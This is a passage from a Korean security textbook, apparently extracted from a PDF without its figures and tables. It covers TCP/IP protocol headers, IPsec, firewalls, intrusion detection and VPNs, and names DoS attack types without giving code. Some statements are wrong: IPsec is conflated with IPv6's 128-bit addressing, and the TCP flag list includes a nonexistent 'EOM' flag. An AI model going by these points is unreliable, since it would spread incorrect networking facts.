호스트의 주소지정(Addressing)과 패킷의 조각화(Fragmentation)를 수행하는 프 로토콜로, TCP/IP 아키텍처의 기본 베이스이다. 따라서 인터넷에 연결된 모든 호스트는 IP를 사용해야 한다. IP의 표준안은 RFC 791 및 MIL-STD 1777에 명시되어 있다. o IP 프로토콜의 특성 - 비연결 프로토콜 (Connectionless Protocol) - 필요 시 패킷 분할 - 32bit의 인터넷 주소를 사용하여 주소 지정 - 최대 패킷 크기 : 65,536bytes - 데이터를 제외한 헤더 부분에 관해서만 체크썸 (checksum) 수행 - 필요에 따라 요구되는 프로토콜 필드는 선택적인 것으로 지정 - 패킷 활동 시간 제한 o IP 헤더 구조IP 데이터그램(Datagram)은 헤더 영역과 텍스트 영역으로 구성되는데, 헤더 부분은 아래 (그림 5-6)과 같이 20byte의 고정된 부분과 가변 길이의 optional 부분을 갖고 있다. - 버전(Version) : IP의 버전을 나타내며, 각 데이터그램이 버전 정보를 갖고 있음으로써 전송 중에 프로토콜의 변경 가능성에 대응하게 된다. - 헤더 길이(IHL) : 헤더의 길이가 일정하지 않기 때문에 길이에 대한 정보를 포함하며, 최소값은 5이다. - 서비스 유형(Type of service) : 호스트에서 하위 네트워크(Subnetwork)에 요구하는 전송의 신뢰도와 속도에 대한 유형을 표시한다. 102
103 - 패킷 길이(Total length) : 프로토콜 헤더를 포함한 패킷 전체의 길이를 나타낸다. 16 bit 필드이므로 하나의 IP 패킷은 최대 65,536bytes까지의 길이가 가능하다. - 식별자(Identification) : IP는 데이터 그램을 몇 개의 조각(Fragment)으로 분리하는 경우가 있는데, 이 조각들이 하나의 데이터 그램에서 분리된 것임을 알려주는 정보로써 하나의 데이터 그램에서 분리된 모든 조각들은 동일한 값을 가진다. 이어서 오는 1 bit는 사용되지 않는 bit이다. - DF(Don t Fragment) : 데이터 그램의 분리를 제어하기 위한 플래그이다. 값이 '1'일 경우 목적지에서 조각을 다시 조합할 수 없기 때문에 데이터 그램을 분리하지 말도록 하위 네트워크에 지시하는 의미를 갖는다. - MF(More Fragments) : 데이터 그램이 여러 조각으로 분리된 경우 뒤에 이어지는 조각이 있는지의 여부를 표시한다. 이 플래그는 손실 조각 없이 전체 데이터 그램이 모아질 수 있도록 패킷길이 필드와 함께 이중으로 체크하는 역할을 한다. - 조각 옵셋(Fragment offset) : 데이터 그램이 여러 조각으로 분리된 경우 데이터 그램 내에서 각 조각의 위치를 나타낸다. 수신측 호스트는 이 필드를 이용해서 본래의 데이터 그램을 정확하게 조합할 수 있다. 13bit의 필드로는 8,192개의 값만을 표현할 수 있기 때문에 데이터 그램의 최대 길이인 65,536byte 를 표현하기 위해서 옵셋은 8byte 단위로 부여되며, 옵셋 값에 8을 곱한 값이 실제 위치 값이 된다. - 활동 시간(Time to live) : 네트워크 상에서 끝없이 표류하는 패킷이 없도록 하기 위해 얼마 동안 활동하다 소멸될 것인지를 지정한다. 모든 노드(node)는 실제 처리시간에 관계없이 이 필드의 값을 '1'씩 감소 시켜야 한다. 따라서 활동 시간은 패킷이 전송 중 거쳐야 할 최대 노드 수를 나타내는 것이 보통이며 최대값은 255이다. - 전송 프로토콜(Transport protocol) : 패킷을 전달받을 상위 트랜스포트 계층의 프로토콜 을 표시한다. TCP에 해당하는 값은 '6'이고, UDP는 '17', ICMP는 '1'이다. 현재 약 50개의 공식적인 상 위 프로토콜이 존재한다. - 헤더 체크썸(Header checksum) : 프로토콜 헤더에 대한 체크썸이다. 효율을 높이기 위해 IP 패킷의 사용자 데이터는 검사하지 않으며(수신측의 트랜스포트 프로토콜에서 수행), 각 노드에서 활동시간(TTL)이 감소되므로 체크썸 필드도 다시 계산되어야 한다. - 근원지 및 목적지 주소(Source address and Destination address) : 인터넷 상의 모든 호스트는 유일한 인터넷 주소를 가져야 하며, 전송 중인 패킷은 목적지의 인터넷 주소에 따라 전달된다. - 옵션(Options) : Security, source routing, error reporting, debugging, time stamping 등 특정 작업에 사용된다. (2) ICMP ICMP(Internet Control Message Protocol)는 IP 구현에 반드시 함께 구성되는 요소로서 네트워크 상에서 IP 패킷이 전송 도중 오류가 발생하여 더 이상 목적지까지 도착할 수 없을 때 발신 호스트에 오류 및 진단 데이터를 전송하는 기능을 수행한다. 즉, ICMP 프로토콜은 전송 도중에 에러가 발생한 경우 송신자에게 발생된 에러에 관한 정보를 통지하기 위한 목적으로 사용되는 프로토콜이다. o ICMP 헤더 구조 o ICMP 메시지의 종류 103
104 ICMP 메시지의 종류는 [표 5-4]와 같이 나누어질 수 있다. o ICMP 패킷의 유형 - 목적지 도착 불가능(Destination Unreachable) : 서브넷 혹은 게이트웨이가 목적지 (네트워크, 호스트, 프로토콜 또는 포트)를 알 수 없을 때 혹은 데이터그램 분리가 필요하나, DF bit가 '1'로 셋팅되어 있어 전송이 불가능할 때 발생한다. - 송신 제한(Source Quench): 호스트에서 너무 많은 패킷이 전송되어 게이트웨이가 메시지를 보관할 만큼 충분한 용량을 갖지 못하는 경우에 발생한다. 이 때 송신 호스트는 메시지 전송 빈도를 줄여야 한다. UDP는 이 메시지를 무시하므로 송신측의 응용프로그램이 이를 처리해야 한다. - 방향 전환(Redirect) : 게이트웨이에서 잘못 라우팅된 패킷을 발견했을 때 발생한다. - 반향 요구 및 반향 응답(Echo Request and Echo Reply) : 상대방이 동작 중인지, 또는 상대방까지의 경과 시간이 얼마인지를 측정하는데 사용될 수 있으며, 반향 요구를 받은 상대방은 반향 응답을 보내게 된다. - 시간 초과(Time Exceeded) : IP 데이터그램의 활동 시간(Time to live)이 '0'이 되었을 때 발생한다. 이러한 현상은 패킷의 루핑(looping), 네트워크의 혼잡, 활동 시간이 너무 적게 설정되었을 때 발생하게 된다. - 매개변수 이상(Parameter Problem) : IP 헤더에 잘못된 필드가 발견되었을 때 발생한다. 이 문제는 송신 호스트의 IP 소프트웨어에 오류가 있음을 가리킨다. - Timestamp 요청 및 응답 : 네트워크의 성능을 측정하기 위해 사용되는 것으로, 응답 측 에서는 메시지의 도착시간과 출발시간을 응답 메시지에 기록하여 전달한다. 104
105 (3) ARP/RARP 물리적 네트워크에서는 인터넷 주소만으로는 목적지를 찾을 수 없으며 인터넷에서는 물리적 네트워크 주소를 사용할 수 없는 문제가 발생하기 때문에 인터넷에 속한 스테이션은 48bit의 물리적 네트워크 주소(Ethernet 주소)와 32bit의 인터넷 주소를 갖게 된다. ARP(Address Resolution Protocol)와 RARP(Reversed Address Resolution Protocol)는 인터넷 주소를 물 리적 네트워크 주소로, 물리적 네트워크 주소를 인터넷 주소로 변환해 주는 기능을 수행하는 프로토콜 이다. 즉 ARP의 기본적인 목적은 인터넷 주소를 물리적인 하드웨어 주소로 변환하는 것이다. o ARP 수행 절차다음 (그림 5-7)은 IP 주소가 인 A 시스템이 IP 주소가 인 시스템의 Ethernet 주소를 찾는 과정을 설명한 것이다. - A 컴퓨터: IP 계층으로부터 Ethernet 네트워크 인터페이스에 데이터그램이 전달된다. - A 컴퓨터: 데이터그램의 목적지 IP 주소에 해당하는 Ethernet 주소를 내부 테이블에서 탐색한다. - A 컴퓨터: 내부 테이블에서 Ethernet 주소가 발견되면 해당 주소의 Ethernet 패킷을 만들어 전송한다. - A 컴퓨터: 내부 테이블에 유효한 주소가 없으면 ARP 패킷에 목적지 호스트의 Internet 주소를 담아 전송한다. - 네트워크 상의 모든 컴퓨터는 이 ARP 패킷을 받아 자신의 Internet 주소와 비교한다. - 동일 주소를 갖고 있는 컴퓨터 B는 자신의 Ethernet 주소를 담은 ARP 응답 패킷을 전송한다. - 컴퓨터 A는 B로부터 전달된 주소를 내부 테이블에 기록하고 IP 패킷을 B에게 직접 전송한다. - Ethernet 주소는 Ethernet 제어기마다 하드웨어적으로 고정되어 있는데 반해 IP 주소는 'ifconfig'라는 명령에 따라 변경될 수 있다. 따라서 구현에 따라 다르지만 1분 ~ 20분 사이의 간격을 두고 각 컴퓨터는 내부 테이블을 삭제하고 위와 같은 동작을 반복하여 정확한 주소를 유지하게 되며, 한 번의 탐색 절차에 소요되는 시간은 보통 수 milliseconds이다. 105
106 o RARP 수행 절차RARP(Reversed Address Resolution Protocol)는 ARP와는 반대로 하드웨어 주소를 IP 주소로 변환하는 기능을 수행한다. 예를 들어 디스크가 없는 워크스테이션의 경우 자신의 IP 주소를 별도로 보관하고 있지 않기 때문에 정상적인 기능을 수행하기에 앞서 RARP 서버를 수행하고 있는 스테이션을 목표로 자신의 Ethernet 주소를 전송하며, RARP 서버의 응답을 통해 자신의 IP 주소를 알게 된다. (4) IPSEC 프로토콜 (가) IPSEC 프로토콜 개요 인터넷 가입자가 폭발적으로 증가로 인하여 IPv4 기반의 TCP/IP는 사용자 증가에 대한 적절한 대응의 한계를 가지게 되었다. 폭증하는 인터넷 프로토콜(IP)의 어드레스 수용 및 멀티미디어 실시간 처리 및 보안 대처 능력이 있는 기술적, 물리적 대처 가능한 IPv6 프로토콜(일명, 차세대 IP 프로토콜)이 필요하 게 되었다. 다음 [표 5-5]는 IPv4와 IPv6을 비교한 것이다. o IPv6 주소 할당 체계 - 유니캐스트(Unicast) 주소 : 단일 송신자와 단일 수신자 간의 통신을 위한 주소 체계 - 애니캐스트 (Anycast)주소 : 네트워크 상의 어떠한 송신자와 가장 가까이 있는 수신자 그룹 간의 통신을 위한 주소 체계 - 멀티캐스트(Multicast) 주소 : 단일 송신자와 다중 수신자 간의 통신을 위한 주소 체계 IPSEC는 128bit의 IP 주소 체계를 가진 차세대 TCP/IP 표준으로, 인터넷 표준을 정의하는 IETF(Internet Engineering Task Force)의 권고안대로 설계된 차세대 표준 IP 프로토콜이다. 106
107 (나) IPSEC 주요 구성 요소 아래 [표 5-6]은 IPSEC 주요 구성 요소에 대한 설명이다. 1) AH(Authentication Header) AH는 IP 데이터그램에 대한 인증과 무결성 보장을 제공하는 메커니즘이다. o AH의 기능 - 비연결형 무결성 보장(connectionless integrity) 보장 - 데이터 근원지 인증(Data Source Authentication)- Sequence number를 이용한 Replay 공격 방지 o AH의 특징 - 각각의 데이터그램에 근거한 인증 적용- MD5, SHA와 같은 메시지 인증 코드 사용 2) ESP(Encapsulation Security Payload) ESP는 IP 데이터그램에 대한 기밀성과 무결성 보장을 제공하는 메커니즘이다. o ESP의 기능 - 암호화를 통해 데이터 기밀성 유지- 비연결형 무결성 보장 - IP Packet 단위의 무결성 보장 - 데이터 근원지 인증(Data Source Authentication)- Sequence number를 이용한 Replay 공격 방지 o ESP의 특징 - 공개키 기반의 키교환 메커니즘을 이용한 암호화(IP 데이터그램에 3DES, AES 등의 알고리즘을 적용하여 전송 데이터의 암호화) - IPv4에서는 선택이지만 IPv6에서는 필수적으로 구현되어야 함 3) 보호 연관(SA, Security Association) AH와 ESP는 송신자와 수신자 간에 키, 인증 알고리즘, 암호 알고리즘, 그리고 이러 한 알고리즘에 필요한 부가적인 파라미터 집합들에 대한 합의가 필요하다. 여기서 키, 인증 알고리즘 등 이들 각각을 보호 속성이라하며, 이러한 보호 속성들의 집합을 보호 연관(Security Association)이라 한다. IPSEC의 처리는 보호 연관에 의하여 결정되며 각 객체들은 이 연관들을 공유하고 있다고 가정한다. 각 보호 연관은 각 종단시스템에서의 속성 집합에 의하여 정의되고SPI(Security Parameter Index)와 목적지 주소에 의하여 식별된다. 107
108 일반적으로 보호 연관에는 인증과 암호 알고리즘의 종류와 사용되는 키의 정보, 키의 수명 및 키의 변환이 일어나는 시간 등의 매개변수를 포함하고 있다. 라. Transport Layer 수신측에 전달되는 데이터에 오류가 없고 데이터의 순서가 수신측에 그대로 보존되도록 보장하는 연결 지향 서비스(Connection oriented service)의 역할을 하는 종단간(end-to-end) 서비스 계층이다. 한편, 패킷의 순서에 무관하게 수신되며, 에러 처리도 하지않는 비연결 서비스 (Connectionless service)와 다 중 목적지에 메시지를 전송하는 서비스도 있다. TCP와 UDP는 각각 연결지향 및 비연결지향 트랜스포트 프로토콜로서 잘 알려진 트렌스포트 계층 프로토콜이다. (1) 연결형/비연결형 프로토콜 이해 o 연결형 프로토콜(Connection-Oriented Protocol) 아래 [표 5-7]과 같은 기능과 특징을 가진다. 108
109 o 비연결형 프로토콜(Connectionless Protocol) 아래 [표 5-8]과 같은 기능과 특징을 가진다. o 비연결형 프로토콜과 연결형 프로토콜의 비교 - 신뢰성으로 프로토콜의 우열을 따지면 안되며, 응용프로그램의 목적에 따라 적합 여부 판단해야 한다. - 비연결형 프로토콜은 100% 메시지가 전달되지 않아도 되는 응용프로그램에 적합하다 (비연결형 프로토콜 = best effort 전달 서비스 = 데이터그램 서비스). - TCP/IP 프로토콜은 비연결형 프로토콜과 연결형 프로토콜을 종합한 형태의 통신이다. IP(Internet Protocol): 비연결형 네트워크 계층 서비스 UDP(User Datagram Protocol): 비연결형 전달 계층 프로토콜 TCP(Transmission Control Protocol): 연결형 전달 계층 프로토콜 (2)TCP TCP(Transmission Control Protocol)는 IP의 상위에서 수행되는 트랜스포트 계층의 프로토콜이다. RFC 793 및 MIL-STD 1778에 명시되어 있으며, 주요 임무는 네트워크를 통한 안정성 있는 데이터의 전송이 다. o TCP의 특성 - 연결형 프로토콜(Connection Oriented) - 동시에 양방향 전송(full duplex)이 가능한 가상 선로(Virtual Circuit) 제공 - 사용자가 느끼는 데이터 전송은 블럭 단위의 전송이 아니라 연속되는 데이터의 흐름과 같다 - 안정성 있는 데이터 전송 (오류제어, 흐름제어)- 슬라이딩 윈도우 프로토콜을 사용한 데이터 전송 109
110 o TCP 헤더 구조 다음 (그림 5-8)은 TCP 헤더 구조이다. - 근원지 포트(Source port) : 가상 선로의 송신측 포트(end point of sender) - 목적지 포트(Destination port) : 가상 선로의 수신측 포트(end point of receiver) - 일련 번호(Sequence number) : 송신자가 전송하는 데이터의 일련 번호 - 전송 확인(Piggyback acknowledgement) : 수신자가 응답하는 받은 데이터의 수 일련번호와 전송 확인은 데이터 흐름 제어(Flow control)에 사용되는 32 bit 정수로서, 슬라이딩 윈도우 프로토콜은 송신자가 일련번호와 함께 데이터를 전송하고, 수신자는 받은 데이터 수를 의미하는 전송 확인 번호를 응답함으로써 안정적인 데이터 전송을 보장해 준다. - TCP 헤더 길이(TCP header length) : TCP 헤더에 몇 개의 32 bit 워드가 포함되어 있는가를 나타내는 필드로서 옵션 필드가 가변 길이를 갖기 때문에 필요하며, 이 값을 이용하여 실제 데이터의 시작점을 계산할 수 있다. - URG(Urgent) : 급송 지점(Urgent pointer)이 사용될 때 1로 설정 - ACK(Acknowledgement) : 전송 확인(Piggyback acknowledgement)이 필요로 할 때 1로 설정. - EOM(End of message) : 마지막 메시지임을 가리킴 - RST(Reset) : 연결의 재설정 (reset a connection) - SYN(Synchronization) : 연결 설정 요구(establish connection) - FIN(Finish) : 연결 해제에 사용된다. 송신측에서 더 이상의 전송할 데이터가 없음을 의미한다. - 윈도우 크기(Window size) : 수신측에서 수신할 수 있는 최대 byte 수를 가리킨다. 송신측은 전송한 데이터에 대한 수신측의 전송확인(ACK)이 도착하기 전에도 윈도우 크기 만큼의 데이터를 연속적으로 보낼 수 있다(full duplex). 수신측에서는 자신의 버퍼 크기에 따라 이 값을 조절하며, 윈도우 크기가 '0'이 되면 송신자는 전송을 잠시 중단한다. - 체크썸(Checksum) : 전송 데이터에 대한 완벽한 신뢰성을 위한 것으로, 모든 데이터의 합에 대한 '1'의 보수로 계산된다. - 급송 지점(Urgent point) : 다음에 이어지는 데이터가 급송되어야 함을 의미하며, 인터럽트 메시지 대신 사용된다. - 옵션(Options) : 전송 셋업 과정의 버퍼 크기에 대한 통신 등 기타 목적에 활용된다. 110
111 o 포트 번호포트 번호는 트랜스포트 계층의 TCP 및 UDP 프로토콜이 사용하는 것으로, 하나의 호스트 에서 다중의 사용자와 다중의 프로세스가 작업을 하게 됨으로써 포트 번호가 호스트 내부의 통신 주체 를 구분해 준다. IP가 인터넷 주소에 따라 호스트 간 전송을 수행하는 것과 마찬가지로 TCP는 포트 번 호를 사용하여 전송된 패킷을 해당 프로세스에게 전달한다. 하나의 프로세스는 여러 개의 포트를 동시 에 사용할 수 있고, 하나의 포트 번호를 여러 개의 프로세스가 공유하기도 한다. 유닉스 상에서 주로 사용하는 서비스의 포트 번호(서비스 포트/번호 프로토콜)는 telnet 23/TCP, ftp 21/TCP, smtp 25/TCP, rlogin 513/TCP, rsh 514/TCP, portmap 111/TCP, rwho 513/UDP, portmap 111/UDP 등이다. 다음 [표 5-9]는 포트가 할당되는 원칙을 설명한 것이다. (3)UDP UDP(User Datagram Protocol)는 트랜스포트 계층에 해당하는 비연결 프로토콜 (Connectionless Protocol)이며 RFC 768에 명시되어 있다. o UDP의 특성 - 가상 선로 (Virtual Circuit)의 개념이 없는 비연결 프로토콜이다. - 데이터 전송이 블록 단위이다. - 데이터 전송에 안정성이 없다(블록 재전송 및 흐름제어 등이 없다). - 슬라이딩 윈도우 등의 복잡한 기술을 사용하지 않는다. - UDP의 각 사용자는 16bit의 포트 번호를 할당 받는다. 111
112 제 2절. 침입 차단 시스템 chapter 1. 침입차단시스템 개요 가. 침입차단시스템 정의 침입차단시스템은 다음의 특성을 가지는 네트워크 사이의 구성 요소로 정의된다. '신뢰하는 네트워크(내부)와 신뢰하지 않는 네트워크(외부)로 분리하여 내부에서 외부로 또는 외부에서 내부로 전송되는 모든 트래픽은 반드시 이를 통과하여야 하고, 반드시 정의되고 허가된(Firewall Security Policy) 트래픽만 통과하여야 하며, 시스템 자체는 침투에 대하여 저항력을 보유한 보안시스템 이다' 침입차단시스템은 비인가자의 불법 접근을 네트워크 수준에서 효율적으로 차단하여 조직의 정보 자산 을 안전하게 보호할 수 있도록 네트워크 수준에서 접근 통제를 수행하는 가장 대표적인 보안 솔루션이 다. 나. 침입차단시스템 주요 기능 아래 [표 5-26]은 침입차단시스템의 주요 기능에 대한 설명이다. 112
113 다. 침입차단시스템 종류 침입차단시스템은 OSI 어느 계층에서 운영되는가에 따라 패킷 필터링과 어플리케이션 프록시 방식으로 나뉜다. 다음 [표 5-28]은 두 방식에 대한 비교표이다. 113
114 chapter 2. 침입차단시스템 보안 정책 침입차단시스템의 접근 통제는 IP 주소와 서비스 Port를 통제대상 으로 하는 보안 정책으로 구성되며 보안 정책의 기본 원칙은 다음과 같다. 'Deny any services, unless expressly permitted; It's cool but stiff Permit any services, unless expressly denied; It's dangerous but flexible.(특별히 허가되지 않은 모든 서비스를 거부하라. 이것은 안전하지만 경직된다. 특별히 거부되지 않은 모든 서비스를 허가하라. 이것은 위험하지만, 유연하다.) 침입차단시스템의 접근 통제 원칙은 위의 2가지 분류 기준 중 첫 번째 원칙(Deny any services, unless expressly permitted : 특별히 허가될 때까지는 모든 서비스를 거부한다)을 적용하여 우선적으로 접근 시도를 차단한 후, 침입차단시스템의 보안 정책으로 허용한 서버(IP 주소)와 서비스(Port)만을 통과할 수 있도록 구현되어 있다. o 보안정책의 구성침입차단시스템의 보안 정책은 발신지 서버의 IP와 Port, 목적지 서버의 IP와 Port를 기준으로 '거절', '허용', '인증', '보안'의 통제정책을 선택하여 적용한다. 다음 [표 5-29]는 보안 정책을 통제 정책 별로 구분한 것이다. 114
115 제 3절. 침입 탐지 시스템 chapter 1. 침입탐지시스템 개요 가. 침입탐지시스템(IDS) 정의 침입탐지시스템은 대상 시스템(네트워크 세그먼트 탐지 영역)에 대한 인가되지 않은 행위와 비정상적 인 행동을 탐지하고, 탐지된 불법 행위를 구별하여 실시간으로 침입을 차단하는 기능을 가진 보안시스 템이다. 또한 한국정보보호진흥원( 침입차단시스템을 '컴퓨터 시스템의 비정 상적인 사용, 오용, 남용 등을 가능하면 실시간으로 탐지하는 시스템'이라고 정의한다. 침입탐지시스템은 일반적인 보안시스템 구현 절차의 관점에서 침입차단시스템과 더불어 가장 우선적으 로 구축되었으며, 침입탐지시스템의 구축 목적은 해킹 등의 불법 행위에 대한 실시간 탐지 및 차단과 침입차단시스템에서 허용한 패킷을 이용하는 해킹 공격의 방어 등의 목적으로 구축된다. 나. 침입탐지시스템 도입 목적 및 필요성 침입탐지시스템은 IT 정보자산을 공격하는 구체적인 해킹 행위를 실시간으로 탐지함으로써, 보다 능동 적으로 침해 사고를 예방하고 대응할 수 있는 보안시스템이다. 또한 침입차단시스템에서 허용한 IP와 Port를 이용한 불법 행위를 탐지함으로써 침입차단시스템의 단점을 보완할 수 있으며, 보안 관리자의 부재 시에도 탐지된 해킹 행위에 대한 자동대응을 수행함으로써 보다 효과적인 정보 보안을 할 수 있 다. o 해킹 행위에 대해 보다 능동적인 대응 : 실시간 Session kill을 통한 실시간 대응 o 침입차단시스템의 수동적인 보안 정책 보완 : IP 주소와 서비스 Port 단위 통제의 한계성을 보완하여 네트워크 패킷을 분석하여 실제 공격 행위를 탐지하여 대응 o 효과적인 보안 강화 : 설정된 보안 정책에 따라 관리자 부재 시에도 자동 대응이 가능 o 내부사용자의 불법 행위 탐지 및 대응 : 외부사용자의 불법 행위 뿐만 아니라 내부 사용자의 권한을 초과하는 행위와 오용 행위를 탐지 다. 침입탐지시스템 주요 기능 다음 [표 5-30]은 침입탐지시스템의 주요 기능에 대한 설명이다. 115
116 라. 침입탐지 시 조치 유형 침입이 탐지되었을 때 침입탐지시스템이 설정된 보안 정책에 따라 자동으로 조치할 수 있는 유형은 다 음 [표 5-31]과 같다. 마. 침입탐지시스템 종류 침입탐지시스템의 분류 기준은 탐지하는 데이터의 소스에 따른 분류와 공격 행위의 판단을 결정하는 침입탐지 모델 기반에 따라 다음 [표 5-32]와 같이 분류된다. 116
117 chapter 2. 침입탐지시스템 보안 정책 침입탐지시스템의 표준 보안 정책은 감시대상 영역에서 탐지하고자 하는 공격 패턴(Attack Signature) 에 대한 정의와 탐지된 공격 행위에 대한 대응 방법을 보안 정책으로 정의한다. 가. 공격 패턴(Attack Signature) 침입탐지시스템에서 탐지하는 공격 패턴은 '백도어', '서비스거부 공격', '불법접근시도', '사전공격 시도', '의심스러운 행위', '프로토콜 해독공격' 등으로 구분되며, 각 분류 기준별 대표적인 공격 유형은 아래 [표 5-33]과 같다. 나. 공격 패턴의 위험도 침입탐지시스템에서 탐지하는 공격 패턴은 국제 표준화되고 있는 CVE(Common Vulnerability Exposure)를 기준으로 하여, 그 위험도에 따라 High, Medium, Low의 위험도 가 각 공격 패턴별로 정의되어 있다. 공격 패턴의 위험도는 탐지된 공격 패턴이 실제 공격이 아닌데도 공격으로 판단하는 오판 여부(False Positive)와 공격 패턴의 중요도 및 위급상황 정도에 따라 구분된다. 117
118 다음 [표 5-34]는 공격 패턴의 위험도에 대한 설명이다. chapter 3. 침입탐지시스템 한계성 및 고려 사항 침입탐지시스템은 다양한 공격 기법으로 이루어지는 실제 공격 행위에 초점을 맞추어, 공격을 실시간 으로 탐지하고 자동으로 대응하도록 설계된 보안시스템이다. 그러나 공격 행위에 대한 자동대응 TCP 포트를 이용하는 해킹 공격으로 제한되며, 공격자를 근본적으로 차단할 수 없는 한계성을 가지고 있다. 따라서 침입차단시스템(Firewall)과 연동을 통하여 각 단위 보안시스템의 장단점을 상호 보완함으로써 보안 수준을 향상시킬 수 있다. 가. 침입탐지시스템의 한계성 다음 [표 5-35]는 침입탐지시스템의 한계성을 설명한다. 118
119 나. 침입탐지시스템 도입 시 고려 사항 탐지된 공격에 대한 자동 대응 및 근원적 차단의 한계성은 침입차단시스템과 침입탐지시스템의 상호 연동을 통하여 한계성을 보완할 수 있으며, 침입탐지시스템 우회공격기법의 탐지 잠재적 취약점은 ESM을 통한 통합 모니터링 및 통합 로그 관리 등을 통하여 보다 안전한 침해사고 예방이 가능하다. o 침입차단시스템-침입탐지시스템 연동 : 탐지된 공격에 대한 자동 대응 및 공격자의 근원적 차단이 필요 o 기존의 해킹 공격은 알려져 있는 취약점을 공격하는 형태로 침입탐지시스템은 알려진 공격 패턴을 인식하여 해킹을 차단할 수 있었으나, 해킹 기술의 고도화로 침입탐지시스템 우회공격기법이 다수 개 발되어 침입탐지시스템 만으로 안전한 해킹 대응이 불가능 o 침입탐지시스템의 효율적인 보안대책 기능인 자동화된 공격 행위 차단기능인 실시간 Session kill 은 TCP 프로토콜을 기반으로 하는 해킹에만 가능하며 다음과 같은 UDP, ICMP 프로토콜을 기반으로 하는 해킹 행위에 대한 차단이 불가능 o UDP 기반 해킹공격 코드 : Land attack, UDP bomp, UDP Flooding, Bonk, Boink, Jolt 등 다수이며 주로 서비스 거부공격으로 사용 o ICMP 기반 해킹공격 코드 : Ping bomb, Smurf attack, ICMP request/reply, Redirect attack 등 다수 119
120 제 4절. 가상사설망 chapter 1. 가상사설망 개요 가. 가상사설망 정의 최근 인터넷을 이용하여 원격 사용자나 이동 사용자가 자사의 인트라넷에 접속하여 정보를 공유하게 할 수 있도록 하는 가상사설망(VPN : Virtual Private Network)은 Public Network(공중망)상에서 물리적 인 네트워크 구성과 무관하게 논리적으로 폐쇄된 망을 구성하여 사설망과 같은 정보보호 효과를 얻을 수 있도록 구성되는 네트워크를 말한다. 나. 가상사설망 등장 배경 기존의 Remote Access Solution인 X.25 전용회선, Frame Relay와 같은 사설망(Private Network)이 가 지고 있는 장점은 네트워크를 직접적으로 통제함으로써 네트워크의 운영에 유연성과 독립성을 제공하 고 네트워크 장비에 대해 독점적으로 사용함으로써 인증되지 않은 접근에 대해 높은 수준의 정보보호 를 구현하는데 있다. 그러나 사설망(Private Network)에 의존하는 기업들은 독자적인 지역적, 국가적, 글로벌 네트워크를 필요로 하며, 이를 위해서는 막대한 비용의 초기 투자가 필요하게 된다. 따라서 사설망(Private Network)를 도입할 것인가의 여부를 결정하는 요소로 기업들은 운영의 유연성 과 보안성을 중요 기준으로 삼기도 하며, 이와 함께 설비 투자비용과 운영비용이 부담되는 회사들은 VPN을 이용한 통신 서비스를 사용한다. 공중망(Public Network)을 활용한 통신은 사설망(Private Network)과 비교하여 다음과 같은 장점을 제 공한다. o 투자비용이 VPN 장비로 한정되며, 교환장비, 전송장비, 회선설비 등에 대한 투자가 불필 요하다. o 높은 수준의 가용성, 신뢰성을 제공하며, 지역적 한계를 극복할 수 있다. o 인증된 접근에 대해 정보 보호를 제공한다. 다. 가상사설망 분류 가상사설망은 접속 방법, 이용회선, 서비스 제공 방식, 응용 방식, 그리고 구현 방식 등에 따라 [표 5-36]과 같이 다양한 형태로 구분할 수 있다. 120
121 chapter 2. 가상사설망 기술 저렴한 비용으로 안전한 네트워크를 구현하기 위한 방법으로 제시된 가상사설망은 기본적으로 데이터 의 안전성과 신뢰성을 향상시키는데 그 목적이 있다. 이러한 가상사설망 기술의 목적을 달성하기 위해 서는 사용자 및 데이터 인증 기술, 데이터에 대한 무결성 및 신뢰성을 보장할 수 있는 기술을 제공하 여야 한다. 이러한 기술들을 제공하기 위해 VPN은 기본적으로 VPN 장비(H/W & S/W)의 암호화키를 관리하는 키 관리와 안전한 암호화 키 교환을 제공하는 키 관리 기술, 공중망을 전용망과 같이 이용하기 위한 터널 링 기술, 그리고 가상사설망 자원의 충돌을 방지하고 일정한 성능을 유지하기 위한 가상사설망 관리 기술 등을 제공해야 한다(표 5-37 참고). 가. 키 관리 기술(Key Management Technology) VPN 솔루션의 기본 구성요소인 정보보호 알고리즘에서 생성되는 키에 대한 전체적인 관리를 수행하는 키 관리 기술에서는 키의 랜덤성을 제공할 수 있는 키 생성과 VPN 사용자 간의 안전한 키 교환을 제 공해주는 키 교환기술이 핵심 기술이다. 키 관리 기술에 대해 IPSEC Working Group에서는 Cisco의 키 교환 기술을 채택하여 업계 표준으로 등록되어 있는 상태이다. 다음 [표 5-38]은 키 관리 기술의 한 예 이다. 121
122 나. 터널링 기술(Tunneling Technology) 공중망으로 전용선과 같은 정보보호 효과를 제공하는 터널링 기술은 프로토콜이 적용되는 OSI 계층에 따라 2계층 터널링 기술과 3계층 터널링 기술로 분류할 수 있다. 다음 [표 5-39]는 터널링 기술를 분류 한 것이다. o L2TP 터널링 기술2계층 터널링 기술인 L2TP는 MS사의 PPTP와 Cisco의 L2F 방식을 통합한 터널링 기술로, 이동 사용자와 기업간의 VPN 접속을 제공하는 터널링 기술이다. 데이터 링크 계층에서 구현되어 단지 PPP 서비스만을 지원할 수 있으며 End-to-End 방식에서만 암 복호화가 가능하다. o IPSEC 터널링 기술3계층 터널링 기술인 IPSEC(IP Security) 터널링 기술은 기업 대 기업 간의 VPN 연계를 지원하기 위한 터널링 기술로, IPSEC Working Group에서 제안한 방식 이다. IPSEC 터널링 기술은 L2TP 터널링 기술에 비해 다양한 네트워크 서비스를 제공함 으로써 적용 범위가 다양하다는 장점이 있으며, 대부분의 제품들이 IPSEC를 지원함으로 써 호환성이 높은 터널링 기술이다. 다. 가상사설망 관리 기술 가상사설망(VPN) 관리 기술 또는 네트워크 관리 기술은 가상사설망 자원의 충돌을 방지하고, 일정한 성능을 제공할 수 있어야 한다. 그리고 사용자에게 안정성과 서비스 제공자에게 자원의 효율적 이용을 제공할 수 있는 가상사설망 관리 기술은 필수적이다. 가상사설망 관리 기술에서는 네트워크 자원 관리의 효율성, 초기 서비스 제공을 위한 시간 비용의 최 소화, 서비스 전환의 용이성, 관리되는 서비스의 투명성 등이 주요 과제이다. 122
